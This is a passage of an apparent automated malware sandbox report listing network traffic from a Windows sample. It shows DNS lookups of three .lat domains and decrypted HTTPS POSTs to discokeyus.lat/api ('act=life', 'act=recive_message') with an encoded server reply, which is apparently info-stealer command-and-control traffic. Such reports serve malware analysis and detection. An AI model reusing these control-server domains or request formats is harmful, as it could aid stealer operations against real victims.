                                                                                                              Dec 20, 2024 16:55:49.317349911 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:49.317614079 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:49.319152117 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:49.319195986 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:49.319246054 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.075803995 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.075865984 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.075894117 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.075921059 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.075944901 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.075973988 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.075988054 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.083815098 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.083889961 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.083899021 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.092665911 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.092737913 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.092744112 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.092780113 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.092838049 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.100739002 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.156351089 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.195379019 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.250041008 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.250052929 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271349907 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271392107 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271513939 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271531105 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271563053 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271702051 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271714926 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.271739006 CET49718443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.271744967 CET44349718104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.614350080 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.614372969 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:50.614434958 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.614752054 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:50.614764929 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.829432964 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.829516888 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.831108093 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.831120014 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.831459999 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:51.832890034 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.833071947 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:51.833101988 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.735425949 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.735548973 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.735634089 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.738003969 CET49719443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.738028049 CET44349719104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.939160109 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.939218044 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:52.939340115 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.939626932 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:52.939646006 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.160629988 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.160731077 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.161969900 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.161982059 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.162226915 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.163445950 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.163597107 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.163634062 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.163692951 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.211333990 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.990446091 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.990515947 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:54.990669012 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.990739107 CET49721443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:54.990767002 CET44349721104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:55.947637081 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:55.947685957 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:55.947773933 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:55.948128939 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:55.948153019 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.164815903 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.164911032 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.166687012 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.166704893 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.167123079 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.168477058 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.168672085 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.168728113 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:57.168804884 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:57.168816090 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:58.116678953 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:58.116786003 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:58.116945982 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:58.116998911 CET49723443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:58.117022038 CET44349723104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:59.096456051 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:59.096501112 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:55:59.096736908 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:59.096967936 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:55:59.096986055 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.318391085 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.318495989 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.319693089 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.319703102 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.320033073 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:00.329849958 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.329919100 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:00.329925060 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.110909939 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.111494064 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.111659050 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.121673107 CET49726443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.121691942 CET44349726104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.771243095 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.771269083 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:01.771342039 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.771696091 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:01.771709919 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:02.993489981 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:02.993587017 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.002646923 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.002655983 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.002959013 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.033124924 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034171104 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034220934 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034311056 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034349918 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034445047 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034506083 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034658909 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034691095 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034821033 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034851074 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.034976006 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.034996033 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.035005093 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.035128117 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.035160065 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.079327106 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.079473972 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.079519987 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.079535007 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.123336077 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.123502970 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.123548985 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.123581886 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.167335987 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.167476892 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:03.215334892 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:03.397480011 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.880937099 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.881027937 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.881113052 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.881341934 CET49729443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.881361961 CET44349729104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.932346106 CET49730443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.932389975 CET44349730104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:06.932496071 CET49730443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.933260918 CET49730443192.168.2.6104.21.21.99
                                                                                                              Dec 20, 2024 16:56:06.933305979 CET44349730104.21.21.99192.168.2.6
                                                                                                              Dec 20, 2024 16:56:07.187799931 CET49730443192.168.2.6104.21.21.99

                                                                                                              UDP Packets

                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Dec 20, 2024 16:55:43.732477903 CET5846253192.168.2.61.1.1.1
                                                                                                              Dec 20, 2024 16:55:43.871666908 CET53584621.1.1.1192.168.2.6
                                                                                                              Dec 20, 2024 16:55:43.929541111 CET6449553192.168.2.61.1.1.1
                                                                                                              Dec 20, 2024 16:55:44.072011948 CET53644951.1.1.1192.168.2.6
                                                                                                              Dec 20, 2024 16:55:44.125790119 CET6343553192.168.2.61.1.1.1
                                                                                                              Dec 20, 2024 16:55:44.266213894 CET53634351.1.1.1192.168.2.6

                                                                                                              DNS Queries

                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                              Dec 20, 2024 16:55:43.732477903 CET192.168.2.61.1.1.10x323cStandard query (0)sweepyribs.latA (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 16:55:43.929541111 CET192.168.2.61.1.1.10x2440Standard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 16:55:44.125790119 CET192.168.2.61.1.1.10xaec9Standard query (0)discokeyus.latA (IP address)IN (0x0001)false

                                                                                                              DNS Answers

                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                              Dec 20, 2024 16:55:43.871666908 CET1.1.1.1192.168.2.60x323cName error (3)sweepyribs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 16:55:44.072011948 CET1.1.1.1192.168.2.60x2440Name error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 16:55:44.266213894 CET1.1.1.1192.168.2.60xaec9No error (0)discokeyus.lat104.21.21.99A (IP address)IN (0x0001)false
                                                                                                              Dec 20, 2024 16:55:44.266213894 CET1.1.1.1192.168.2.60xaec9No error (0)discokeyus.lat172.67.197.170A (IP address)IN (0x0001)false

                                                                                                              HTTP Request Dependency Graph

                                                                                                              • discokeyus.lat

                                                                                                              HTTPS Proxied Packets

                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              0192.168.2.649716104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:55:46 UTC261OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:55:46 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-20 15:55:47 UTC1126INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:55:47 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=hj6ccklum2v3e90elo6pk1nar0; expires=Tue, 15 Apr 2025 09:42:26 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F8C%2F6NqhOQbI2BBtbPlNpKv5ZcA0xvgrZrV1iBZq5JW6qwtQp6azMbTV92iwjytaKP9HJoaAofultLMQOPM3NBMg22E60gsKW81bgWU8Glj1hunF9e0Fm696bw4Uh8k%2Fhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d192df7b4238-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1623&min_rtt=1620&rtt_var=613&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2832&recv_bytes=905&delivery_rate=1775075&cwnd=244&unsent_bytes=0&cid=3c3a7d2c5ae78816&ts=1756&x=0"
                                                                                                              2024-12-20 15:55:47 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-20 15:55:47 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                              1192.168.2.649718104.21.21.99443828C:\Users\user\Desktop\NAliwxUTJ4.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-20 15:55:49 UTC262OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 47
                                                                                                              Host: discokeyus.lat
                                                                                                              2024-12-20 15:55:49 UTC47OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 50 73 46 4b 44 67 2d 2d 70 61 62 6c 6f 26 6a 3d
                                                                                                              Data Ascii: act=recive_message&ver=4.0&lid=PsFKDg--pablo&j=
                                                                                                              2024-12-20 15:55:50 UTC1123INHTTP/1.1 200 OK
                                                                                                              Date: Fri, 20 Dec 2024 15:55:49 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=8n1n4nlbs76k2j6gc8dvkpoonc; expires=Tue, 15 Apr 2025 09:42:28 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uXXAjYSz8ZLfdrq4Y9QXTJ1%2BifAu2FHJCiylsIabHt4dwEM9SQmtPkN6HsXIHrxm66vyAqtk60HuaI2NS2IAtjEWlj9a1p6qjtoOiuqfT8nl%2BUjdBgOen1EHu7FdQjQajg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f50d1a2fb02f797-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1613&min_rtt=1601&rtt_var=625&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2833&recv_bytes=945&delivery_rate=1715628&cwnd=161&unsent_bytes=0&cid=d340cadadb2341ba&ts=767&x=0"
                                                                                                              2024-12-20 15:55:50 UTC246INData Raw: 34 39 31 63 0d 0a 79 53 37 72 55 62 31 78 6c 49 7a 32 76 4d 6d 7a 61 71 55 71 6f 2f 47 38 77 46 39 39 30 43 53 38 2f 77 39 48 30 69 6d 61 51 36 36 79 44 4a 31 7a 68 30 57 34 72 6f 58 5a 36 34 6b 65 31 31 2f 47 33 5a 36 68 4f 31 2f 71 51 74 32 54 66 43 4c 2b 43 2b 77 75 6a 50 4e 49 69 6a 33 4f 46 4c 69 75 6b 38 54 72 69 54 48 65 43 4d 61 66 6e 76 70 39 47 4c 70 47 33 5a 4e 74 4a 72 6c 47 36 69 2f 4e 6f 55 4b 4d 4f 64 67 53 38 4f 32 61 30 61 7a 57 44 38 52 41 7a 5a 6a 52 71 44 4a 66 2f 41 62 5a 68 53 31 39 38 47 54 2f 4e 38 2b 45 54 35 67 36 6e 77 79 34 39 39 54 5a 70 35 46 51 68 30 76 47 6b 39 43 6d 4f 78 61 34 54 4e 53 62 62 43 4f 34 57 66 4d 6c 78 71 46 4d 6a 7a 6a 53 47 2b 54 67 6b 4e 61 6e 30 41 58 45 43 49 2f 54 32 62 70 39
                                                                                                              Data Ascii: 491cyS7rUb1xlIz2vMmzaqUqo/G8wF990CS8/w9H0imaQ66yDJ1zh0W4roXZ64ke11/G3Z6hO1/qQt2TfCL+C+wujPNIij3OFLiuk8TriTHeCMafnvp9GLpG3ZNtJrlG6i/NoUKMOdgS8O2a0azWD8RAzZjRqDJf/AbZhS198GT/N8+ET5g6nwy499TZp5FQh0vGk9CmOxa4TNSbbCO4WfMlxqFMjzjSG+TgkNan0AXECI/T2bp9
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 52 2f 49 56 37 4a 35 38 4e 4b 56 47 36 43 65 4d 74 41 4b 51 63 39 67 66 74 72 62 55 31 71 66 66 44 63 52 48 78 70 4c 65 73 44 49 66 73 55 37 57 6d 57 63 71 76 30 54 32 4b 38 75 6a 52 59 34 38 32 42 76 77 34 5a 65 65 35 5a 45 50 33 77 69 5a 30 2f 36 79 50 68 79 6d 53 38 2f 64 63 6d 75 70 43 2f 38 74 6a 50 4d 4d 6a 7a 33 65 48 76 62 38 6e 4e 57 67 31 42 72 4d 51 63 79 65 33 71 38 33 45 4c 46 47 32 5a 64 6e 4b 72 70 50 39 53 7a 4b 71 30 7a 4a 66 5a 38 55 37 71 37 4d 6e 6f 6a 55 47 4d 42 45 31 39 48 6b 34 69 4a 52 71 77 62 5a 6b 53 31 39 38 45 50 39 49 73 2b 67 51 34 6f 37 31 41 48 32 2f 4a 4c 54 72 73 4d 4f 77 6b 62 4c 6b 4d 79 6f 4d 78 6d 78 54 39 57 55 61 43 4b 30 43 37 5a 68 79 37 4d 4d 30 58 50 2b 48 76 33 69 6e 73 6d 72 6b 52 65 4a 55 59 47 55 30 75 4a
                                                                                                              Data Ascii: R/IV7J58NKVG6CeMtAKQc9gftrbU1qffDcRHxpLesDIfsU7WmWcqv0T2K8ujRY482Bvw4Zee5ZEP3wiZ0/6yPhymS8/dcmupC/8tjPMMjz3eHvb8nNWg1BrMQcye3q83ELFG2ZdnKrpP9SzKq0zJfZ8U7q7MnojUGMBE19Hk4iJRqwbZkS198EP9Is+gQ4o71AH2/JLTrsMOwkbLkMyoMxmxT9WUaCK0C7Zhy7MM0XP+Hv3insmrkReJUYGU0uJ
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 39 4c 64 49 32 57 33 55 37 68 35 6a 49 46 50 6e 54 44 56 55 63 50 74 6d 74 43 73 78 30 6a 59 42 74 6a 54 32 61 35 39 52 2f 4a 4c 33 35 56 72 4e 37 39 47 2b 79 2f 43 70 45 6d 47 4f 39 38 54 2b 2b 75 51 31 61 44 53 42 63 4e 61 79 35 50 57 70 7a 77 56 75 41 61 51 33 57 6f 39 38 42 4f 34 45 4e 75 67 44 72 77 77 30 52 33 78 2b 4e 54 42 35 63 68 49 77 45 53 42 79 35 36 76 4e 52 71 33 53 64 2b 58 59 79 43 36 52 2f 41 76 7a 37 6c 44 6a 54 50 54 47 2f 7a 6a 6d 74 71 6a 32 41 50 4d 54 73 47 53 31 4f 4a 7a 58 37 56 65 6e 73 55 74 45 62 64 48 39 53 36 4f 6e 6b 2b 48 50 64 67 46 74 76 48 61 78 2b 76 57 42 49 63 51 67 5a 2f 58 6f 6a 59 56 74 6b 62 5a 6b 47 67 6d 74 30 6a 31 4a 73 61 6c 53 34 30 2f 31 68 37 77 37 70 50 61 72 73 4d 4e 7a 6b 54 4e 30 35 44 69 4f 67 66 79
                                                                                                              Data Ascii: 9LdI2W3U7h5jIFPnTDVUcPtmtCsx0jYBtjT2a59R/JL35VrN79G+y/CpEmGO98T++uQ1aDSBcNay5PWpzwVuAaQ3Wo98BO4ENugDrww0R3x+NTB5chIwESBy56vNRq3Sd+XYyC6R/Avz7lDjTPTG/zjmtqj2APMTsGS1OJzX7VensUtEbdH9S6Onk+HPdgFtvHax+vWBIcQgZ/XojYVtkbZkGgmt0j1JsalS40/1h7w7pParsMNzkTN05DiOgfy
                                                                                                              2024-12-20 15:55:50 UTC1369INData Raw: 6f 70 38 42 4f 34 4b 4d 57 35 51 6f 63 36 30 68 58 2b 36 5a 72 54 6f 4e 63 44 77 45 2f 48 6e 74 61 76 4f 42 79 7a 51 74 53 50 62 69 36 36 52 76 4a 68 67 75 74 4c 6b 58 4f 48 55 39 48 69 76 63 36 77 77 78 36 48 56 34 2b 4b 6e 71 55 78 58 2b 6f 47 33 5a 4a 6b 4b 72 68 44 39 79 37 49 70 55 71 50 50 74 6f 63 2f 50 79 63 30 4b 62 61 42 38 78 61 77 5a 37 61 72 6a 6b 58 75 55 79 65 30 79 30 69 71 41 75 67 59 66 6d 6d 51 34 6b 77 79 56 50 70 6f 49 32 65 72 4e 31 49 6e 77 6a 4e 6e 64 36 74 4d 52 4f 35 54 74 2b 52 59 79 4b 31 51 76 41 70 33 71 70 49 67 54 4c 52 48 50 66 71 6b 64 75 76 31 67 7a 42 52 34 48 64 6e 71 55 6c 58 2b 6f 47 38 62 70 59 5a 35 46 78 75 44 36 43 73 67 79 4f 50 35 39 4c 74 75 4b 58 30 71 50 65 44 73 35 45 79 35 72 56 72 6a 59 62 76 6b 2f 62 6d
                                                                                                              Data Ascii: op8BO4KMW5Qoc60hX+6ZrToNcDwE/HntavOByzQtSPbi66RvJhgutLkXOHU9Hivc6wwx6HV4+KnqUxX+oG3ZJkKrhD9y7IpUqPPtoc/Pyc0KbaB8xawZ7arjkXuUye0y0iqAugYfmmQ4kwyVPpoI2erN1InwjNnd6tMRO5Tt+RYyK1QvAp3qpIgTLRHPfqkduv1gzBR4HdnqUlX+oG8bpYZ5FxuD6CsgyOP59LtuKX0qPeDs5Ey5rVrjYbvk/bm
